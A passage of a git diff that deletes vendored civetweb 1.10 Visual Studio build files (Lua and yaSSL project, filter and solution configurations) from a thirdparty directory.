-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug CONSOLE|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_SERVER_STATS;USE_DUKTAPE;USE_IPV6;LUA_COMPAT_ALL;USE_LUA;USE_LUA_SQLITE3;USE_LUA_FILE_SYSTEM;USE_WEBSOCKET;WIN32;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\src\third_party\duktape-1.5.2\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <Text Include="ReadMe.txt" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-    <ClInclude Include="..\..\src\third_party\civetweb_lua.h" />

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.h" />

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lua.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\src\main.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\resources\res.rc" />

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\resources\systray.ico" />

-  </ItemGroup>

-  <ItemGroup>

-    <ProjectReference Include="..\lua_lib\lua_lib.vcxproj">

-      <Project>{8f5e5d77-d269-4665-9e27-1045da6cf0d8}</Project>

-    </ProjectReference>

-    <ProjectReference Include="..\duktape_lib\duktape_lib.vcxproj">

-      <Project>{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}</Project>

-    </ProjectReference>

-  </ItemGroup>

-  <ItemGroup>

-    <None Include="..\..\src\handle_form.inl" />

-    <None Include="..\..\src\md5.inl" />

-    <None Include="..\..\src\sha1.inl" />

-    <None Include="..\..\src\mod_duktape.inl" />

-    <None Include="..\..\src\mod_lua.inl" />

-    <None Include="..\..\src\timer.inl" />

-    <None Include="..\..\src\file_ops.inl" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj.filters
deleted file mode 100644
index caf951c..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_lua/civetweb_lua.vcxproj.filters
+++ /dev/null
@@ -1,78 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-    <Filter Include="inl files">

-      <UniqueIdentifier>{1ef3413b-2315-48f2-ad22-57af6b4f7aca}</UniqueIdentifier>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <Text Include="ReadMe.txt" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lua.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\civetweb_lua.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\main.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\resources\res.rc">

-      <Filter>Resource Files</Filter>

-    </ResourceCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\resources\systray.ico">

-      <Filter>Resource Files</Filter>

-    </Image>

-  </ItemGroup>

-  <ItemGroup>

-    <None Include="..\..\src\md5.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\sha1.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\mod_lua.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\timer.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\file_ops.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\mod_duktape.inl">

-      <Filter>inl files</Filter>

-    </None>

-    <None Include="..\..\src\handle_form.inl">

-      <Filter>inl files</Filter>

-    </None>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl.sln b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl.sln
deleted file mode 100644
index 49e36ce..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl.sln
+++ /dev/null
@@ -1,36 +0,0 @@
-

-Microsoft Visual Studio Solution File, Format Version 12.00

-# Visual Studio 2012

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "civetweb_yassl", "civetweb_yassl\civetweb_yassl.vcxproj", "{F02517CC-F896-41A2-86E4-509E55C70059}"

-EndProject

-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "yassl_lib", "yassl_lib\yassl_lib.vcxproj", "{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}"

-EndProject

-Global

-	GlobalSection(SolutionConfigurationPlatforms) = preSolution

-		Debug|Win32 = Debug|Win32

-		Debug|x64 = Debug|x64

-		Release|Win32 = Release|Win32

-		Release|x64 = Release|x64

-	EndGlobalSection

-	GlobalSection(ProjectConfigurationPlatforms) = postSolution

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|Win32.ActiveCfg = Debug|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|Win32.Build.0 = Debug|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|x64.ActiveCfg = Debug|x64

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Debug|x64.Build.0 = Debug|x64

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|Win32.ActiveCfg = Release|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|Win32.Build.0 = Release|Win32

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|x64.ActiveCfg = Release|x64

-		{F02517CC-F896-41A2-86E4-509E55C70059}.Release|x64.Build.0 = Release|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|Win32.ActiveCfg = Debug|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|Win32.Build.0 = Debug|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|x64.ActiveCfg = Debug|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Debug|x64.Build.0 = Debug|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|Win32.ActiveCfg = Release|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|Win32.Build.0 = Release|Win32

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|x64.ActiveCfg = Release|x64

-		{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}.Release|x64.Build.0 = Release|x64

-	EndGlobalSection

-	GlobalSection(SolutionProperties) = preSolution

-		HideSolutionNode = FALSE

-	EndGlobalSection

-EndGlobal

diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj
deleted file mode 100644
index b9a048e..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj
+++ /dev/null
@@ -1,170 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{F02517CC-F896-41A2-86E4-509E55C70059}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>civetweb_yassl</RootNamespace>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_YASSL;NO_SSL_DL;WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\include;$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\..\include\civetweb.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\..\src\main.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\..\resources\res.rc" />

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\..\resources\systray.ico" />

-  </ItemGroup>

-  <ItemGroup>

-    <ProjectReference Include="..\yassl_lib\yassl_lib.vcxproj">

-      <Project>{8c0c878b-bbd6-4241-bca6-61753ffcc7f1}</Project>

-    </ProjectReference>

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj.filters
deleted file mode 100644
index 1c5ee40..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/civetweb_yassl/civetweb_yassl.vcxproj.filters
+++ /dev/null
@@ -1,40 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\src\main.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ResourceCompile Include="..\..\..\resources\res.rc">

-      <Filter>Resource Files</Filter>

-    </ResourceCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <Image Include="..\..\..\resources\systray.ico">

-      <Filter>Resource Files</Filter>

-    </Image>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj
deleted file mode 100644
index 033b82d..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj
+++ /dev/null
@@ -1,185 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{8C0C878B-BBD6-4241-BCA6-61753FFCC7F1}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>yassl_lib</RootNamespace>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v110</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

